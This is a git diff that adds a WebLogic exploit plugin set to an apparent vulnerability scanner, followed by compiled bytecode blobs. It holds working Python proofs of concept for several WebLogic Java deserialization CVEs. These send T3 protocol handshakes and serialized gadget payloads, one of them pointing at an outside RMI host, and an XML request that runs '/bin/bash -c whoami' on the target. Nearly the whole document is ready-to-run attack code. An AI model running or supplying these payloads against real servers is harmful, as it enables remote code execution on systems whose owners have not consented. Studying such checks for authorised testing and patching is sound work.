6612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['\\$Proxy[0-9]+'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2017_3506.py b/plugins/weblogic_poc/CVE_2017_3506.py new file mode 100644 index 0000000..1b2fc62 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2017_3506.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import re +from sys import argv + +heads = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', + 'Content-Type': 'text/xml;charset=UTF-8' + } + +def poc(url): + if not url.startswith("http"): + url = "http://" + url + if "/" in url: + url += '/wls-wsat/CoordinatorPortType' + post_str = ''' + + + + + + + + /bin/bash + + + -c + + + whoami + + + + + + + + + + ''' + + try: + response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) + response = response.text + response = re.search(r"\.*\<\/faultstring\>", response).group(0) + except Exception as e: + response = "" + + if 'java.lang.ProcessBuilder' in response or "0" in response: + result = '[+]目标weblogic存在JAVA反序列化漏洞:CVE-2017-3506' + return result + else: + result = '[-]目标weblogic未检测到CVE-2017-3506' + return result +def run(rip,rport): + url=rip+':'+str(rport) + result = poc(url=url) + print(result) + +if __name__ == '__main__': + run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2628.py b/plugins/weblogic_poc/CVE_2018_2628.py new file mode 100644 index 0000000..1f7c360 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2018_2628.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import sys +import time +import re + + +VUL=['CVE-2018-2628'] +PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] +VER_SIG=['\\$Proxy[0-9]+'] + +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' + +def buildT3RequestObject(sock,dport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) + + +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + time.sleep(2) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res + +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) + +def run(dip,dport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,dport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + # print 'rs',rs + checkVul(rs,server_addr,index) + + +if __name__=="__main__": + dip = sys.argv[1] + dport = int(sys.argv[2]) + run(dip,dport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2893.py b/plugins/weblogic_poc/CVE_2018_2893.py new file mode 100644 index 0000000..04a978a --- /dev/null +++ b/plugins/weblogic_poc/CVE_2018_2893.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re +import sys + +VUL=['CVE-2018-2893'] + +PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878'] + +VER_SIG=['StreamMessageImpl'] + +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + data = sock.recv(1024) + + +def buildT3RequestObject(sock,port): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + + + +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + time.sleep(2) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res + +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + # pass + # print (u'目标weblogic未检测到:{}'.format(VUL[index])) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) + +def run(dip,dport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,dport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + #print 'rs',rs + checkVul(rs,server_addr,index) + +if __name__=="__main__": + # dip = sys.argv[1] + # dport = int(sys.argv[2]) + # run(dip,dport,0) + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/__init__.py b/plugins/weblogic_poc/__init__.py new file mode 100644 index 0000000..f021474 --- /dev/null +++ b/plugins/weblogic_poc/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' diff --git a/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..0a165d6aab2af4c7c778bee910ebed1d8bd379d1 GIT binary patch literal 4462 zcmeHL?Qayv8K2#Izw_C~QGt|#j;0mZiuZg6G+>7^s($F6 zW}ex3=6RWCW}f-&?Tg2w2%am+E7{l52>q46G#?){_Cj&?K&7D!(gaO3gpA-(F(U%? z8NR$f;}?+T*8;ynnE(!I!3B{F;(!*?!b>7>#7Wc}Q6d6D(S!_7qW;urv*whuT5LYZ zV@4~yk>wn@lBfWw*IVUYcmrlOnSd_NhKdgX0zwtwClm5AGVAMLK#XtvWu7uX1N*LO4 ztz#wX##TDCIM|3U30K8RT#IOkYXIGG@Gf47xBTn`KRew{t!pJ(f%X!g4T25RJ+b&> zcUvNrmeNuxIy^a;-mxQkaBMKOD>^Q@*(Zfdv-ED)(WWnh-`ezBorZf25z(6V* z)sY{e!h5jm5Q>cpSYY>8|DgXRgxK$nLu37j#Lm+9>GfUo482G1R8@9;gf6j<`||Wn zcAnj!ce>~@5z7uiB_foFSh7K^14?t*pos)zd(W4%g6z-W4ZX>3p#bRFcoNSV*1WDt z0hvq*=Ot)m?_x={h%eFTKT+XO1kM{Vk(AoSWy?0 zc|2;)S?oIdZkb+J$vz1|D|yi<{3Xy9lC)DWC4%P+th$n7nwG1$ASDgAnxkgX zQoYWDim4fx9A&SvdtKjQ7ha~mFejL?nzMA?KnW zwkdARCHa`!+!zlAf{oB;k$Fk66*Y&Y`pP;$4ITuTyd&imTN+aq%ixR2uF+-s3cXzJ zrprEVF*K*Bu0_f&dUg!-Bvp7(oT8gp zYf~`5&e4nP=GH}e(GN49L2k?<`6x{e#`DJoT{+bcZ$e2g97?6nTPN`HPg1s8t(9;Hjdq#rA;XL zFF&6%Fyyd8l>8K&0Z`M^uBLekU@02vC2z|&)YCWE>&NJoZl~91##?kzbRN5nd4pU- zUtO-QkN$owyGU=d3+&gKM=J#vS_CBP?iTn-*aR^XA)eij;#p5BbcOwaez0?Kh<>!s zGhFnBd&g(3C%S=)+N~z&4(eVgpQN}xqvj$3g_Yz=H#C%fApni!MsKk#>P`W zZAJht<)>}Pe2IQFu|1L61((&2c1r0T+oaUC0T=mk39BtH1a9LQ&&C?qsck!F6f*fd zCOzzZx>R$!P-3eW}e30y~q8g7r(#%=h~42d%T0(GQ=YXw`3>5 z238#05LlgW8XIs1^+4?TJ<9bBJNwEmcT}9&_mw`hIs0Ej2Ygn6$It-ud=U)-!bzNGkoDG$5s<6pFRsL3(XB zy~FOp06^6nUR(_Vzy7TOR9dj@8+o-+pr`lt(9_%L{e8tY#~%3t=c*~Ej`@l>_9s}^)DbpgAz(C`6ybYlNhEjD>*wPmWjCl zzyUv+^KLE^0xENlL?;C$T?^StncpI{FzB=aC*d22d=I?*XXg3AtX)=f3d#4|#Nt>f zJJCO`YXI0!Dg;leiurhlZ4~Bp)5$hZy=+@*c4T_LoE}K+khkyLk(TUo%|{9*|3Y^9 zph7~o5Ei1M9}3hy_=)Squ-M`25a7qDFCj*Ss6aTpsD))Y4@g#)7aO?(vW5O4z=z&Y zEhNjDrOGnl-`-@6H+)t%6-U)|FZeALCZH=A$EVs>ZS*8|=Pj*Z;640b6^DNw`oY04 KxDxIS3;zNo!?n8r literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e769ce239ca1ce29ef9a6fabe6f1cfefd8cebb56 GIT binary patch literal 11024 zcmeHN-ESR772myIzINgyO+#Ct6jO*=)5hM}+0Uv1OcS7`b*d&Lt#NhP-I-0?*w^mf z>ogzN2q{P)K2)CgC>7Y^1&}~Izyqj%2-;Vapgh4dPyEiz-Rt}1B(zNL8&*Dx`D(V$eB~>`pp~Nzk zG&(aKJoNqX#w^}YxI90DEGov0s^Eb}9hA?{G`@lN$I!mGQz;6U=W$cTxKYOZ%)B1y z>6yn>C)8f|g1Z_CV^NZdmoeNjD13TmifCAFAmhnKr!m)P%oq0#@)Uu%b&F9->8YDo z4P)`j^fPBp9J4Lv9kVF~`iba|(9)rV{UQNb&wPmli#QK0H)W%x*HnXK2 zS&@_a0SkN{bg2kIg-hdj31$bLsa3Pa_9sz8fCBUucu^9%Se7_+q!q-fH(GPW`riDQ z7tnlccl>;mTzLhjF+ZXhoWshng7Z$GX75lf-|o#CYwSxJtSisadt6&VGJzEZul>jm zA&n#>Qo5lN*rD`8W?|)cZ)PA9bQQ7?s#zvzttBi~tqTdG`Sf-a)S|GD?{UxWj@l9Fg>{M*W}EE>JqqMq{;$Ym+uqyA)cEcH-!@tD)|K+!neb zCcQ9z^#Wf8Y3jv(>?eur>O8LG)`jL}WDT^OGUSfeQG+^HY3&$oNwYh!AF1a!kT~c? zyzi~KyH=ETna^WI0eW#^g_Ok*pdT9xeW+c->^-UBq~B4CceR3&{~_x8ZNPxV2(3iA zL6|aVO*{0G5m~lr4pyWrhBLUrz8-0ivi_0!D2rk+#E)bWC&G=!>={dq6Y6pLd5KZF znw=@_4r**)OJUb0b?rV2z;)Q}!ZsE-MR7Q?Qdl|;ZH4{Iff~r-D(i&4di{foMH*VM zmnN-7mksMWnyV@INM9;TMbfuhYY&?&B!o@d zREA9Wu>%uFWA)o?y&r6)Q+BDt0P0 